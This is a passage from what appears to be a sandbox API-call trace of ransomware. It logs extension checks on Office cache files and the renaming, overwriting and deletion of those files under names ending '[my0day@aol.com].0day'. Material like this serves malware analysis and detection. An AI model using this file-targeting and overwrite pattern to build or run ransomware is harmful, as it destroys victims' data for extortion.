(lpString=".jpg") returned 4 [0047.745] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.745] lstrlenW (lpString=".doc") returned 4 [0047.745] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString=".docx") returned 5 [0047.745] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0047.745] lstrlenW (lpString=".pdf") returned 4 [0047.745] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString=".xls") returned 4 [0047.745] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString=".xlsx") returned 5 [0047.745] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0047.745] lstrlenW (lpString=".ppt") returned 4 [0047.745] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.745] lstrlenW (lpString=".zip") returned 4 [0047.745] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString=".rar") returned 4 [0047.745] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString=".bz2") returned 4 [0047.745] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.745] lstrlenW (lpString=".7z") returned 3 [0047.745] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.745] lstrlenW (lpString=".dbf") returned 4 [0047.746] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.746] lstrlenW (lpString=".1cd") returned 4 [0047.746] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.746] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.746] lstrlenW (lpString=".jpg") returned 4 [0047.746] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.746] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0047.746] lstrlenW (lpString="PrjPrrWW.cab") returned 12 [0047.746] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.746] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=162970271) returned 1 [0047.746] CloseHandle (hObject=0x190) returned 1 [0047.746] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab")) returned 0x2020 [0047.746] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.746] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0047.747] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.747] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.747] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.747] ReadFile (in: hFile=0x190, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.819] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.819] ReadFile (in: hFile=0x190, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.853] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.853] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.853] ReadFile (in: hFile=0x190, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.899] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.899] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0048.219] SetEndOfFile (hFile=0x190) returned 1 [0048.219] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f720a8 [0048.384] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.384] WriteFile (in: hFile=0x190, lpBuffer=0x3f720a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f720a8*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.384] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x33ce8df, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.384] WriteFile (in: hFile=0x190, lpBuffer=0x3f720a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f720a8*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.387] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x9b2ba9f, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.387] WriteFile (in: hFile=0x190, lpBuffer=0x3f720a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f720a8*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.389] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f720a8 | out: hHeap=0x5f0000) returned 1 [0048.389] CloseHandle (hObject=0x190) returned 1 [0048.389] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.389] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.390] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.390] lstrlenW (lpString=".doc") returned 4 [0048.390] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString=".docx") returned 5 [0048.390] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.390] lstrlenW (lpString=".pdf") returned 4 [0048.390] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString=".xls") returned 4 [0048.390] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString=".xlsx") returned 5 [0048.390] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.390] lstrlenW (lpString=".ppt") returned 4 [0048.390] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.390] lstrlenW (lpString=".zip") returned 4 [0048.390] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString=".rar") returned 4 [0048.390] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString=".bz2") returned 4 [0048.390] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.390] lstrlenW (lpString=".7z") returned 3 [0048.390] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.390] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.390] lstrlenW (lpString=".dbf") returned 4 [0048.390] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.390] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.390] lstrlenW (lpString=".1cd") returned 4 [0048.390] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.390] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.390] lstrlenW (lpString=".jpg") returned 4 [0048.390] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".doc") returned 4 [0048.391] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".docx") returned 5 [0048.391] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0048.391] lstrlenW (lpString=".pdf") returned 4 [0048.391] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".xls") returned 4 [0048.391] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".xlsx") returned 5 [0048.391] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0048.391] lstrlenW (lpString=".ppt") returned 4 [0048.391] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".zip") returned 4 [0048.391] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".rar") returned 4 [0048.391] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString=".bz2") returned 4 [0048.391] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0048.391] lstrlenW (lpString=".7z") returned 3 [0048.391] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".dbf") returned 4 [0048.391] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".1cd") returned 4 [0048.391] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0048.391] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 75 [0048.391] lstrlenW (lpString=".jpg") returned 4 [0048.391] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0048.392] lstrcmpiW (lpString1=".xrm-ms", lpString2=".0day") returned 1 [0048.392] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0048.392] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.392] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=715834) returned 1 [0048.392] CloseHandle (hObject=0x190) returned 1 [0048.392] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0048.392] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.392] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0048.392] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.392] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.392] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0048.393] GetLastError () returned 0x0 [0048.393] ReadFile (in: hFile=0x190, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0048.420] WriteFile (in: hFile=0x228, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0048.434] ReadFile (in: hFile=0x190, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.434] WriteFile (in: hFile=0x228, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x104, lpOverlapped=0x0) returned 1 [0048.434] SetEndOfFile (hFile=0x228) returned 1 [0048.435] CloseHandle (hObject=0x228) returned 1 [0048.435] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.435] SetEndOfFile (hFile=0x190) returned 1 [0048.691] CloseHandle (hObject=0x190) returned 1 [0048.691] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.692] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0048.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.692] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.692] lstrlenW (lpString=".doc") returned 4 [0048.692] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".docx") returned 5 [0048.693] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.693] lstrlenW (lpString=".pdf") returned 4 [0048.693] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".xls") returned 4 [0048.693] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".xlsx") returned 5 [0048.693] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.693] lstrlenW (lpString=".ppt") returned 4 [0048.693] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.693] lstrlenW (lpString=".zip") returned 4 [0048.693] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".rar") returned 4 [0048.693] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".bz2") returned 4 [0048.693] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".7z") returned 3 [0048.693] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.693] lstrlenW (lpString=".dbf") returned 4 [0048.693] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.693] lstrlenW (lpString=".1cd") returned 4 [0048.693] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.693] lstrlenW (lpString=".jpg") returned 4 [0048.693] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.693] lstrlenW (lpString=".doc") returned 4 [0048.693] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0048.693] lstrlenW (lpString=".docx") returned 5 [0048.693] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0048.693] lstrlenW (lpString=".pdf") returned 4 [0048.694] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString=".xls") returned 4 [0048.694] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString=".xlsx") returned 5 [0048.694] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0048.694] lstrlenW (lpString=".ppt") returned 4 [0048.694] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.694] lstrlenW (lpString=".zip") returned 4 [0048.694] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString=".rar") returned 4 [0048.694] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString=".bz2") returned 4 [0048.694] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString=".7z") returned 3 [0048.694] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0048.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.694] lstrlenW (lpString=".dbf") returned 4 [0048.694] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.694] lstrlenW (lpString=".1cd") returned 4 [0048.694] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0048.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0048.694] lstrlenW (lpString=".jpg") returned 4 [0048.694] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0048.694] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0048.694] lstrlenW (lpString="setup.exe") returned 9 [0048.694] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.926] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=1377656) returned 1 [0049.928] CloseHandle (hObject=0x198) returned 1 [0049.928] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0049.928] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0049.928] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0049.928] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.928] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.928] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0049.928] GetLastError () returned 0x0 [0049.929] ReadFile (in: hFile=0x198, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0049.951] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.083] ReadFile (in: hFile=0x198, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x50588, lpOverlapped=0x0) returned 1 [0050.095] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0050.103] ReadFile (in: hFile=0x198, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.103] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0050.103] SetEndOfFile 